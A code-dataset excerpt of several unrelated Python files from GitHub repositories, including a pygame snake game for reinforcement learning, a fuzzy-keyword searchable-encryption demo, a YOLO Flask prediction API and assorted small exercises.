self.screen_x=screen_x\r\n self.screen_y=screen_y\r\n\r\n #初始化蛇\r\n for x in range(4):\r\n self.addNode()\r\n\r\n\r\n\r\n # 在前端增加色块\r\n def addNode(self):\r\n #找到蛇的最前端\r\n if self.body:\r\n node = pygame.Rect(self.body[0].left,self.body[0].top,pixel,pixel)\r\n else:\r\n node = pygame.Rect(0,0,pixel,pixel)\r\n if self.direction==1:\r\n node.left-=pixel\r\n elif self.direction==2:\r\n node.left+=pixel\r\n elif self.direction==3:\r\n node.top-=pixel\r\n elif self.direction==4:\r\n node.top+=pixel\r\n self.body.insert(0,node)\r\n\r\n # 删除最后一个块\r\n def delNode(self):\r\n self.body.pop()\r\n\r\n # 死亡判断\r\n def isDead(self):\r\n # 撞墙\r\n if self.body[0].x not in range(self.screen_x):\r\n return True\r\n if self.body[0].y not in 
range(self.screen_y):\r\n            return True\r\n        # bit itself\r\n        if self.body[0] in self.body[1:]:\r\n            return True\r\n        return False\r\n\r\n    # Update position\r\n    def move(self):\r\n        self.addNode()\r\n        self.delNode()\r\n\r\n    # Change direction, but left/right and up/down cannot be directly reversed\r\n    def changeDirection(self, curkey):\r\n        if (curkey == 1 and self.direction == 2) or (curkey == 2 and self.direction == 1) or (\r\n                curkey == 3 and self.direction == 4) or (curkey == 4 and self.direction == 3):\r\n            return\r\n        self.direction = curkey\r\n\r\n\r\n# Food class\r\nclass Food:\r\n    def __init__(self,screen_x):\r\n        self.body = pygame.Rect(-pixel, 0, pixel, pixel)\r\n        self.screen_x=screen_x\r\n\r\n    def reset(self):\r\n        self.body.x = -pixel #hide the food\r\n        allpos = [pos for pos in range(pixel, self.screen_x-pixel, pixel)] # keep away from the walls: between pixel and SCREEN_X-pixel\r\n        return random.choice(allpos),random.choice(allpos)\r\n\r\n\r\n#Snake game\r\nclass Game:\r\n    def __init__(self,screen):\r\n\r\n        #initialize objects\r\n        self.screen=screen\r\n        self.timer = pygame.time.Clock()\r\n\r\n        #initialize constants\r\n        self.screen_x=screen.get_size()[0]\r\n        self.screen_y = screen.get_size()[1]\r\n        self.FPS=60\r\n        self.reset_score=True #this flag ensures the score is reset only on the next frame\r\n        self.isdead_state = False\r\n        self.game_over=True\r\n        #instantiate\r\n        self.snake = Snake(screen.get_size()[0], screen.get_size()[1])\r\n        self.food = Food(screen.get_size()[0])\r\n\r\n        #initialize the instances\r\n        self.foodReset()\r\n\r\n    def frameStep(self, input_actions):\r\n\r\n        pygame.event.pump()\r\n        reward = 0\r\n        terminal = False\r\n\r\n        if self.reset_score:\r\n            self.score=0\r\n            self.reset_score=False\r\n\r\n        for event in pygame.event.get():\r\n            if event.type == K_ESCAPE or (event.type == KEYDOWN and event.key == K_ESCAPE):\r\n                self.game_over=True\r\n                pygame.quit()\r\n                return 0, 0, -1,self.score\r\n\r\n        #apply the action (a key opposite to the current direction has no effect)\r\n        if input_actions[0] == 1:\r\n            self.snake.changeDirection(1)\r\n        elif input_actions[1] == 1:\r\n            self.snake.changeDirection(2)\r\n        elif input_actions[2] == 1:\r\n            self.snake.changeDirection(3)\r\n        elif input_actions[3] == 1:\r\n            self.snake.changeDirection(4)\r\n\r\n        # Move the snake\r\n        if not self.snake.isDead():\r\n            self.snake.move()\r\n        else:\r\n            self.__init__(self.screen)\r\n            reward = -1\r\n            terminal = True\r\n\r\n        #check whether the food was eaten\r\n        if self.food.body == self.snake.body[0]:\r\n            reward = 0.5\r\n            self.foodReset()\r\n            self.snake.addNode()\r\n            self.score+=1\r\n\r\n        self.screen.fill((0, 0, 0))\r\n        for rect in self.snake.body:\r\n            pygame.draw.rect(self.screen, (20, 220, 39), rect, 0)\r\n        pygame.draw.rect(self.screen, (136, 0, 21), self.food.body, 0)\r\n\r\n        image_data = pygame.surfarray.array3d(pygame.display.get_surface())\r\n        pygame.display.update()\r\n        self.timer.tick(self.FPS)\r\n\r\n        return image_data, reward, terminal,self.score\r\n\r\n    def foodReset(self):\r\n        food_illegal=True\r\n        while food_illegal:\r\n            x,y=self.food.reset()\r\n            if not (x,y) in [(body.x,body.y) for body in self.snake.body]:\r\n                food_illegal=False\r\n        self.food.body.x,self.food.body.y=x,y\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"liangzp/DQLearning-Toolbox","sub_path":"greedySnake.py","file_name":"greedySnake.py","file_ext":"py","file_size_in_byte":4938,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"4039746042","text":"import spacy\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n\n\nnlp = spacy.load('en_core_web_sm') \n\ndef preprocess(text):\n    doc = nlp(text)\n    tokens = [token.lemma_ for token in doc if not token.is_stop and not token.is_punct]\n    return 
tokens\n\ndef extract_key_concepts(abstract):\n    doc = nlp(abstract)\n    key_concepts = [chunk.text for chunk in doc.noun_chunks] \n    return key_concepts\n\n\ndef entity_recognition(abstract):\n    doc = nlp(abstract)\n    entities = [(X.text, X.label_) for X in doc.ents] \n    return entities\n\n\ndef generate_weighted_string(text, repeat=3):\n    concepts = extract_key_concepts(text)\n    entities = entity_recognition(text)\n    entities = [e[0] for e in entities] \n    weighted_concepts = ' '.join(concepts * repeat)\n    weighted_entities = ' '.join(entities * repeat)\n\n\n    return ' '.join([' '.join(preprocess(text)), weighted_concepts, weighted_entities])\n\n\ndef link_abstract_sentences_to_paragraphs(abstract, full_text):\n    paragraphs = full_text.replace('.\\n','\\b**b').replace('-\\n', '').replace('\\n', ' ').split('\\b**b')\n    abstract_sentences = list(nlp(abstract).sents)\n    \n    abstract_sentences_wo_preprocessing = list(abstract_sentences)\n    paragraphs_wo_preprocessing = list(paragraphs)\n    \n    abstract_sentences = [generate_weighted_string(sentence.text) for sentence in abstract_sentences]\n    paragraphs = [generate_weighted_string(para) for para in paragraphs]\n    \n    # abstract_sentences_wo_preprocessing = \n    # paragraphs_wo_preprocessing = {i: paragraph for i, paragraph in enumerate(full_text.split('\\n'))}\n\n    corpus = abstract_sentences + paragraphs\n\n    vectorizer = TfidfVectorizer()\n\n    vectorizer.fit(corpus)\n\n    sentence_paragraph_scores = {}\n    sentence_paragraph_scores_wo = {}\n    for i,sentence in enumerate(abstract_sentences):\n        sentence_vector = vectorizer.transform([sentence]).toarray()\n        paragraph_scores = {}\n        paragraph_scores_wo = {}\n        for j,para in enumerate(paragraphs):\n            para_vector = vectorizer.transform([para]).toarray()\n            similarity = cosine_similarity(sentence_vector, para_vector)\n            paragraph_scores[(j,para)] = similarity[0][0] \n            paragraph_scores_wo[(j,paragraphs_wo_preprocessing[j])] = similarity[0][0]\n\n        sorted_paragraph_scores = sorted(paragraph_scores.items(), key=lambda x: x[1], reverse=True)\n        sentence_paragraph_scores[(i,sentence)] = sorted_paragraph_scores[:3]\n        sorted_paragraph_scores_wo = sorted(paragraph_scores_wo.items(), key=lambda x: x[1], reverse=True)\n        sentence_paragraph_scores_wo[i] = sorted_paragraph_scores_wo[:3]\n    \n    return sentence_paragraph_scores_wo, paragraphs_wo_preprocessing\n\n\n","repo_name":"kimiayazdani/Abstractionist","sub_path":"main_script.py","file_name":"main_script.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13542991492","text":"\nimport kbd2code.keycodes as keycodes\n\nreplace_map = {\n    # Modifiers (L and R prefixes were added)\n    # https://www.emacswiki.org/emacs/EmacsKeyNotation\n    \"C\": \"CONTROL\",\n    \"LC\": \"LCONTROL\",\n    \"RC\": \"RCONTROL\",\n    \"M\": \"MENU\",\n    \"LM\": \"LMENU\",\n    \"RM\": \"RMENU\",\n    \"S\": \"SHIFT\",\n    \"LS\": \"LSHIFT\",\n    \"RS\": \"RSHIFT\",\n    \"DEL\": \"BACK\",\n    \"RET\": \"RETURN\",\n    \"SPC\": \"SPACE\",\n    \"ESC\": \"ESCAPE\",\n    \"TAB\": \"TAB\",\n    # Function Keys\n    # https://www.gnu.org/software/emacs/manual/html_node/emacs/Function-Keys.html\n    # Cursor arrow keys.\n    \"left\": \"LEFT\",\n    \"up\": \"UP\",\n    \"right\": \"RIGHT\",\n    \"down\": \"DOWN\",\n    # Other cursor repositioning keys\n    \"begin\": \"DISABLED\",\n    \"end\": \"END\",\n    \"home\": \"HOME\",\n    \"next\": \"NEXT\",\n    \"prior\": \"PRIOR\",\n    # Miscellaneous function keys.\n    \"select\": \"LAUNCH_MEDIA_SELECT\",\n    \"print\": \"PRINT\",\n    \"execute\": 
\"EXECUTE\",\n \"backtab\": \"DISABLED\",\n \"insert\": \"INSERT\",\n \"undo\": \"DISABLED\",\n \"redo\": \"DISABLED\",\n \"clearline\": \"DISABLED\",\n \"insertline\": \"DISABLED\",\n \"deleteline\": \"DISABLED\",\n \"insertchar\": \"DISABLED\",\n \"deletechar\": \"DISABLED\",\n \"clearline\": \"DISABLED\",\n # Numbered function keys (across the top of the keyboard).\n \"f25\": \"DISABLED\",\n \"f26\": \"DISABLED\",\n \"f27\": \"DISABLED\",\n \"f28\": \"DISABLED\",\n \"f29\": \"DISABLED\",\n \"f30\": \"DISABLED\",\n \"f31\": \"DISABLED\",\n \"f32\": \"DISABLED\",\n \"f33\": \"DISABLED\",\n \"f34\": \"DISABLED\",\n \"f35\": \"DISABLED\",\n # Keypad keys (to the right of the regular keyboard), with names or punctuation.\n \"kp-add\": \"ADD\",\n \"kp-subtract\": \"SUBTRACT\",\n \"kp-multiply\": \"MULTIPLY\",\n \"kp-divide\": \"DIVIDE\",\n \"kp-backtab\": \"DISABLED\",\n \"kp-space\": \"DISABLED\",\n \"kp-tab\": \"DISABLED\",\n \"kp-enter\": \"RETURN\",\n \"kp-separator\": \"SEPARATOR\",\n \"kp-decimal\": \"DECIMAL\",\n \"kp-equal\": \"OEM_PLUS\",\n \"kp-prior\": \"PRIOR\",\n \"kp-next\": \"NEXT\",\n \"kp-end\": \"END\",\n \"kp-home\": \"HOME\",\n \"kp-left\": \"LEFT\",\n \"kp-up\": \"UP\",\n \"kp-right\": \"RIGHT\",\n \"kp-down\": \"DOWN\",\n \"kp-insert\": \"INSERT\",\n \"kp-delete\": \"DELETE\",\n # Keypad keys with digits.\n \"kp-0\": \"NUMPAD0\",\n \"kp-1\": \"NUMPAD1\",\n \"kp-2\": \"NUMPAD2\",\n \"kp-3\": \"NUMPAD3\",\n \"kp-4\": \"NUMPAD4\",\n \"kp-5\": \"NUMPAD5\",\n \"kp-6\": \"NUMPAD6\",\n \"kp-7\": \"NUMPAD7\",\n \"kp-8\": \"NUMPAD8\",\n \"kp-9\": \"NUMPAD9\",\n # Keypad PF keys.\n \"kp-f1\": \"DISABLED\",\n \"kp-f2\": \"DISABLED\",\n \"kp-f3\": \"DISABLED\",\n \"kp-f4\": \"DISABLED\",\n}\n\ndef mapped_name(key_name: str) -> str:\n key_name = replace_map.get(key_name, key_name.upper())\n return \"VK_{}\".format(key_name)\n\ndef mapped_key(key_name: str) -> int:\n return getattr(keycodes.win, mapped_name(key_name), keycodes.win.VK_DISABLED)\n","repo_name":"jonchun/ptoys-mapper","sub_path":"keycodes/maps/win_us.py","file_name":"win_us.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42087463812","text":"def two(num):\n if (num == 1):\n return False\n for i in range(2, int((num ** 0.5) + 1)):\n if (num % i == 0):\n return False\n return True\n\n\nlst = list(range(2, 246912))\nans = []\nfor i in lst:\n if two(i):\n ans.append(i)\n\nwhile True:\n answer = 0\n n = int(input())\n if (n == 0):\n break\n for i in ans:\n if (n < i<=n * 2):\n answer += 1\n\n print(answer)","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"BAEKJOON/solution79.py","file_name":"solution79.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"17694648815","text":"import csv\nimport hashlib\nfrom cryptography.fernet import Fernet\n\n# This project demonstrates searchable encryption method based on fuzzy keyword search\n# Workflow is based on 2010 paper \"Fuzzy Keyword Search over Encrypted Data in Cloud Computing\" by Li et al. 
\n\n# Return a set of fuzzy keywords for a given word\n# Default edit distance is 1\n# TO DO: customize edit distance\ndef build_fuzzy_keyword_set(word):\n\tfuzzy_keys = []\n\tfuzzy_keys.append(\"*\" + word)\n\tfor i in range(len(word)+1):\n\t\tpattern = word[:i] + \"*\" + word[i+1:]\n\t\tfuzzy_keys.append(pattern)\n\treturn fuzzy_keys\n\n# Apply trapdoor function (substituted with SHA-256 hash) to all given fuzzy keywords \ndef build_trapdoor_set(fuzzy_keys):\n\thashed_fuzzy_keys = []\n\tfor word in fuzzy_keys:\n\t\tm = hashlib.sha256()\n\t\tm.update(str.encode(word))\n\t\thashed_fuzzy_keys.append(m.digest())\n\treturn hashed_fuzzy_keys\n\n# seach index table for all fuzzy matches\ndef search(index, query):\n\tresults = []\n\tfor keyword in query:\n\t\tif keyword in index.keys():\n\t\t\tresults = index[keyword]\n\treturn results\n\ndef update_table(index, ct):\n\tif key in index.keys():\n\t\tindex[key].append(ct)\n\telse:\n\t\tindex[key] = [ct]\n\treturn index\n\ndef write_to_file(index):\n\twith open('index.csv', 'w') as f:\n\t\tfor key in index.keys():\n\t\t\tf.write(\"{},{}\\n\".format(key,index[key]))\n\n# Step 1 - Build encrypted index table and store as csv file\n\n# In the index table keys are hashed fuzzy matches for every keyword\n# Values are encrypted keywords + file IDs\n\nsecret_key = Fernet.generate_key() # Secret key that only user knows but server doesn't\ncipher_suite = Fernet(secret_key) # Choose encryption method to be Fernet\nindex = {}\n\nwith open('unencrypted_data.csv', newline='') as csvfile:\n\treader = csv.DictReader(csvfile)\n\tfor row in reader:\n\t\tkeywords = row['keywords'].split()\n\t\tfor word in keywords:\n\t\t\tfuzzy_keys = build_fuzzy_keyword_set(word)\n\t\t\thashed_fuzzy_keys = build_trapdoor_set(fuzzy_keys)\n\t\t\tfor key in hashed_fuzzy_keys:\n\t\t\t\tplaintext = word + \",\" + row['fid']\n\t\t\t\tciphertext = cipher_suite.encrypt(str.encode(plaintext))\n\t\t\t\tindex = update_table(index, ciphertext)\n\twrite_to_file(index)\n\n\n# Step 2 - Simulate User query\n\nquery = input('Enter your query: ')\n#query = 'machine'\n\n# Apply trapdoor function on all fuzzy matches of a given query\nfuzzy_keys = build_fuzzy_keyword_set(query)\nencrypted_query = build_trapdoor_set(fuzzy_keys)\n\nprint(\"\\nA set of fuzzy keywords: \")\nprint(fuzzy_keys)\n\n# Step 3 - Server compares encrypted query keywords with index table and returns results\n\nprint(\"\\nSearching for results...\")\nresults = search(index, encrypted_query)\nif len(results)==0:\n\tprint(\"No results\")\nelse:\n\tprint(\"\\nServer returned these encrypted file identifiers:\\n\")\n\tprint(results)\n\n# Step 4 - User decrypts results\n\ndecrypted_results = []\nfor ct in results:\n\tdecrypted_results.append(cipher_suite.decrypt(ct))\n\nprint(\"\\nDecrypted file identifiers:\\n\")\nprint(decrypted_results)\n\n# Step 5 - User retrieves relevant files given file IDs\n\n# get a set of file ids\nfids = set()\nfor result in decrypted_results:\n\tresult = result.decode(\"utf-8\")\n\tfid = result.split(',')[-1]\n\tfids.add(fid)\nprint('\\n\\nHere are the results that match your query \"{}\":\\n'.format(query))\n\n#retrieve paper titles that match file ids\nwith open('unencrypted_data.csv', newline='') as csvfile:\n\treader = csv.DictReader(csvfile)\n\tfor row in reader:\n\t\tif row['fid'] in 
fids:\n\t\t\tprint(row['title'])\n\t\t\n\n\n\n\n\n\n\n\n\n","repo_name":"dkhlv/404-project","sub_path":"fuzzy_keyword_search.py","file_name":"fuzzy_keyword_search.py","file_ext":"py","file_size_in_byte":3418,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"36839908750","text":"import random\nimport string\n\n\ndef sieve_of_eratosthenes(number):\n    # sieve of eratosthenes algorithm for finding primes\n    # Create a boolean array \"prime[0..n]\" and initialize\n    # all entries in it as true. A value in prime[i] will\n    # finally be false if i is Not a prime, else true.\n    prime = [True for _ in range(number + 1)]\n    p = 2\n    while p * p <= number:\n\n        # If prime[p] is not changed, then it is a prime\n        if prime[p] is True:\n\n            # Update all multiples of p\n            for i in range(p * p, number + 1, p):\n                prime[i] = False\n        p += 1\n\n    return [p for p in range(2, number + 1) if prime[p] is True]\n\n\ndef generate_random_word(alphabet, letters=25):\n    random_word = []\n    random_word_str = []\n    reverse_alphabet = {v: k for k, v in alphabet.items()}\n    print(reverse_alphabet)\n    c_count = 1\n    primes = [alphabet[letter] for letter in string.ascii_uppercase]\n    random_word.append(primes[0] * primes[1])\n    random_word_str.append('AB')\n    for index in range(1, len(primes) - 1):\n        random_word.append(primes[index] * primes[index + 1])\n        random_word_str.append(string.ascii_uppercase[index + 1])\n        c_count += 1\n    remaining_letters = letters - c_count\n    if remaining_letters <= 0:\n        return random_word, random_word_str\n    random.shuffle(primes)\n    previous_prime = alphabet['Z']\n    while remaining_letters > 0:\n        random_int = random.randint(0, len(primes) - 1)\n        random_word_str.append(reverse_alphabet[primes[random_int]])\n        random_word.append(previous_prime * primes[random_int])\n        previous_prime = primes[random_int]\n        remaining_letters -= 1\n    return random_word, random_word_str\n\n\ndef main():\n    primes = sieve_of_eratosthenes(10000)\n    random_p = random.sample(primes, 26)\n    random_p.sort()\n    print(random_p)\n    alphabet_map = {}\n    eng_alpha_str = string.ascii_uppercase\n    assert len(eng_alpha_str) == 26\n    for i in range(26):\n        alphabet_map[eng_alpha_str[i]] = random_p[i]\n    print(alphabet_map)\n    word, word_str = generate_random_word(alphabet_map, 100000)\n    print(' '.join(str(num) for num in word))\n    print(''.join(c for c in word_str))\n    print(len(word), len(''.join(c for c in word_str)))\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"gbouzioto/google_competitions","sub_path":"google_code_jam_2019/qualification_round/problem_3/create_test_data.py","file_name":"create_test_data.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30183221135","text":"\n# Basically I need to write a code that prompts for two numbers (Limit and Copies) and then writes all the numbers from 1 (startvalue) up to and including Limit, Copies number of times and I also need to use nested loops.\r\n#\r\n# Then I have to write a function that prints out a row of numbers separated by tabs, from (startvalue) to and including limit.\r\n\r\nlimit = int(input(\"enter your limit \"))\r\ncopies = int(input(\"enter your copy:\"))\r\nstart_value = 1\r\nfor copy in range(copies):\r\n    # reset per copy so every pass writes the full run from start_value to limit\r\n    end_value = start_value - 1\r\n    results = []\r\n    while end_value < limit:\r\n        end_value += 1\r\n        results.append(end_value)\r\n    
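# A minimal sketch (the name print_row is hypothetical, not part of the\r\n    # original file) of the tab-separated row helper the assignment asks for:\r\n    # def print_row(limit, startvalue=1):\r\n    #     print('\\t'.join(str(n) for n in range(startvalue, limit + 1)))\r\n    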
print(results)\r\n\r\n","repo_name":"Favourmbata/python-project","sub_path":"list/nested_loop_two.py","file_name":"nested_loop_two.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19984659107","text":"import os\n\nimport numpy as np\nimport xarray as xr\nimport hvplot.xarray\nimport intake\n\n\nclass CMBData(object):\n    _axis_order = ('dec', 'ra')\n\n    def __init__(self, catalog_file):\n\n        self.catalog_file = catalog_file\n        self.catalog = intake.open_catalog(catalog_file)\n\n        self._dataset = None\n\n    def _get_coord_axes(self, arr, wcs):\n        axis0 = wcs.all_pix2world(np.array([[0, i] for i in np.arange(arr.shape[0])]), 0)[:, 1]\n        axis1 = wcs.all_pix2world(np.array([[i, 0] for i in np.arange(arr.shape[1])]), 0)[:, 0]\n\n        if self._axis_order == ('ra', 'dec'):\n            return (axis0, axis1)\n        elif self._axis_order == ('dec', 'ra'):\n            return (axis1, axis0)\n\n    def _get_dataarray(self, source):\n        arr = source.read().astype(float)\n        wcs = source.wcs\n        ra, dec = self._get_coord_axes(arr, wcs)\n        return xr.DataArray(arr, dims=self._axis_order,\n                            coords={'ra': ra, 'dec': dec}, name=source.name)\n\n    @property\n    def dataset(self):\n        # Build the xarray Dataset lazily and cache it for later accesses.\n        if self._dataset is None:\n            data_values = {name: self._get_dataarray(src)\n                           for name, src in self.catalog.items()}\n            self._dataset = xr.Dataset(data_values)\n        return self._dataset\n\n    def view(self, name=None, width=1000, height=400, **kwargs):\n        if name is None:\n            name = list(self.dataset.data_vars.keys())[0]\n        if kwargs.get('datashade', False):\n            rasterize = False\n        else:\n            rasterize = True\n        image_kwargs = dict(rasterize=rasterize, width=width, height=height)\n        image_kwargs.update(kwargs)\n        return self.dataset[name].hvplot.image('ra', 'dec', **image_kwargs)\n\n","repo_name":"timothydmorton/pixell_viz","sub_path":"cmbviz/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37747506679","text":"from flask import Flask, request, jsonify, g as app_ctx\nimport io\nimport time\nfrom position_calculator import calculate_position\nimport PIL\nfrom ultralytics import YOLO\n\n\nnavi_app = Flask(__name__)\n\nmodel = YOLO('yolov8n.pt')\n\n\n@navi_app.before_request\ndef logging_before():\n    app_ctx.start_time = time.perf_counter()\n\n\n@navi_app.after_request\ndef logging_after(response):\n    total_time = time.perf_counter() - app_ctx.start_time\n    time_in_ms = int(total_time * 1000)\n    print('Response time => ', time_in_ms, 'ms')\n    return response\n\n\n@navi_app.route('/predict', methods=[\"GET\", \"POST\"])\ndef predict():\n    if request.method != \"POST\":\n        return \"Please send post request\"\n\n    else:\n        frame = request.files.get('frame') # get the frame sent by the API request\n        im_bytes = frame.read() # convert the file into byte stream\n        image = PIL.Image.open(io.BytesIO(im_bytes)) # convert the byte stream into a PIL image\n        image_width, image_height = image.size\n\n        prediction = model(image)\n        obj_info = []\n        for result in prediction:\n            for idx, box in enumerate(result.boxes.xywh):\n                obj = (result.boxes.cls[idx], box)\n                obj_info.append(obj)\n        objects_with_positions = calculate_position(obj_info, image_width,\n                                                    image_height)\n        data = {\n            \"objects_with_positions\": objects_with_positions,\n        }\n        return jsonify(data)\n\n\nnavi_app.run(port=5000, host='0.0.0.0', 
debug=False)\n","repo_name":"RedMarshmellow/Project-NAVI","sub_path":"API.py","file_name":"API.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8730874640","text":"\n\n\nimport pandas as pd\nimport os\n\n\nPATH_FROM_TRANSLATE_DESCRIPTION = 'data/output/3_data_translate/da_en_description'\nPATH_FROM_TRANSLATE_SUBJECT = 'data/output/3_data_translate/da_en_subject'\n\n# This is the last file for step 1.\n# Length: 302832\nPATH_FROM_MODELING = 'data/output/1_data_modeling/output_roles.csv'\n\nPATH_FROM_MERGED_DESCRIPTION = 'data/output/4_data_merged/output_description_merged.csv'\nPATH_FROM_MERGED_SUBJECT = 'data/output/4_data_merged/output_subject_merged.csv'\nPATH_FROM_MERGED = 'data/output/4_data_merged/output_merged.csv'\n\n\nclass DataMerged:\n\n    def __init__(self):\n\n        self.df_description = pd.read_csv(PATH_FROM_TRANSLATE_DESCRIPTION + '/1000_output_en.csv', sep=\",\", quotechar=\"\\\"\", dtype=str)\n        self.df_subject = pd.read_csv(PATH_FROM_TRANSLATE_SUBJECT + '/1000_output_en.csv', sep=\",\", quotechar=\"\\\"\", dtype=str)\n        self.df_description_merge = pd.DataFrame([], columns=self.df_description.columns)\n        self.df_subject_merge = pd.DataFrame([], columns=self.df_subject.columns)\n        self.df = pd.read_csv(PATH_FROM_MODELING, sep=\",\", quotechar=\"\\\"\", dtype=str, usecols=[\n            'requestId', 'year', 'day_of_week', 'month', 'hour', 'solution_time', 'last_communication_time', 'derived_completed_time', 'time_bins', 'user', 'responsible_first', 'responsible_last', 'received_by'\n        ])\n\n        self.run()\n\n\n    def run(self):\n\n        if not os.path.isfile(PATH_FROM_MERGED_SUBJECT):\n            self.checkpoint_merged_subject()\n        else:\n            self.df_subject = pd.read_csv(PATH_FROM_MERGED_SUBJECT, sep=\",\", quotechar=\"\\\"\", dtype=str)\n            print(f'Skip checkpoint_merged_subject(). To rerun delete {PATH_FROM_MERGED_SUBJECT}')\n\n        if not os.path.isfile(PATH_FROM_MERGED_DESCRIPTION):\n            self.checkpoint_merged_description()\n        else:\n            self.df_description = pd.read_csv(PATH_FROM_MERGED_DESCRIPTION, sep=\",\", quotechar=\"\\\"\", dtype=str)\n            print(f'Skip checkpoint_merged_description(). To rerun delete {PATH_FROM_MERGED_DESCRIPTION}')\n\n        if not os.path.isfile(PATH_FROM_MERGED):\n            self.checkpoint_merged()\n        else:\n            self.df = pd.read_csv(PATH_FROM_MERGED, sep=\",\", quotechar=\"\\\"\", dtype=str)\n            print(f'Skip checkpoint_merged(). 
To rerun delete {PATH_FROM_MERGED}')\n\n\n    def checkpoint_merged(self):\n        self.df = self.df.drop_duplicates(subset=['requestId'])\n        print('Merging: {}'.format(len(self.df)))\n        self.df = pd.merge(self.df, self.df_subject, on='requestId', how='left')\n        print('Merging: {}'.format(len(self.df)))\n        self.df = pd.merge(self.df, self.df_description, on='requestId', how='left')\n        print('Merging: {}'.format(len(self.df)))\n        self.df.to_csv(PATH_FROM_MERGED, index=False)\n\n\n    def checkpoint_merged_subject(self):\n        files = os.listdir(PATH_FROM_TRANSLATE_SUBJECT)\n        for file in files:\n            df = pd.read_csv(f\"{PATH_FROM_TRANSLATE_SUBJECT}/\" + file)\n            self.df_subject_merge = pd.concat([self.df_subject_merge, df])\n        self.df_subject_merge.to_csv(PATH_FROM_MERGED_SUBJECT, index=False)\n\n\n    def checkpoint_merged_description(self):\n        files = os.listdir(PATH_FROM_TRANSLATE_DESCRIPTION)\n        for file in files:\n            df = pd.read_csv(f\"{PATH_FROM_TRANSLATE_DESCRIPTION}/\" + file)\n            self.df_description_merge = pd.concat([self.df_description_merge, df])\n        self.df_description_merge.to_csv(PATH_FROM_MERGED_DESCRIPTION, index=False)\n\n\nDataMerged()","repo_name":"T0mmy0lsen/IHLP-Helper","sub_path":"backend/saved/pipeline/4_data_merged.py","file_name":"4_data_merged.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44099107620","text":"t_atual = 0\n\ng = { 0 : [1],\n      1 : [2,3],\n      2 : [4,5],\n      3 : [4],\n      4 : [6],\n      5 : [6], \n    }\n\ndef DFS_VISIT(grafo, s, f):\n    global t_atual\n    chaves = list(grafo.keys())\n    cor = {}\n    \n    for i in range(len(chaves)):\n        cor[chaves[i]] = 'B'\n\n    for i in grafo[s]:\n        if(f == i and cor[f] == 'B'):\n            t_atual = t_atual + 1\n        elif(cor[i] == 'B'):\n            cor[i] = 'C'\n            DFS_VISIT(grafo, i, f)\n    cor[s] = 'P'\n\n\nDFS_VISIT(g, 0, 4)\nprint(t_atual)\n'''for i in range(6):\n    for j in range(6):\n        if(i != j):\n            print(\"---------------\" + str(i) + \"-\" + str(j) + \"-----------\")\n            DFS(g, i, j)'''\n","repo_name":"LuisAcioly/Grafos","sub_path":"Uri/Prova final/blabluba.py","file_name":"blabluba.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23979325317","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr  3 10:14:50 2018\r\n\r\n@author: Darkn\r\n\"\"\"\r\nimport numpy as np\r\nimport random\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nfrom scipy import special\r\n\r\n\r\nclass BLFM:\r\n    def InitList_movielens(self, filename):\r\n        'initialize each list of the data'\r\n\r\n\r\n        self.train = []\r\n        self.test = []\r\n        with open(filename) as f:\r\n            token = ','\r\n            if '.dat' in filename:\r\n                token = '::'\r\n            lines = f.readlines()[1:]\r\n            for line in lines:\r\n                fields = line.strip().split(token)\r\n                self.train.append(fields[:3])\r\n                # if random.randint(1,100) > 1:\r\n                #     self.train.append(fields[:3])\r\n                # else:\r\n                #     self.test.append(fields[:3])\r\n        print('reading the data was done!\\nthe length of train is ',len(self.train))\r\n        print('length of test is ', len(self.test))\r\n    \r\n    def __init__(self, filename, N=15):\r\n        self.InitList_movielens(filename)\r\n        self.F = 10\r\n        self.n = N # number of iterations\r\n        self.a = 0.01\r\n        self.b1 = 2.2\r\n        self.b2 = 0.7\r\n        self.init()\r\n    \r\n    def init(self):\r\n        'initialize y, e1, e2 and the user/item sets'\r\n        self.y = {}\r\n        self.e1 = {}\r\n        self.e2 = {}\r\n        self.U = set()\r\n        self.I = 
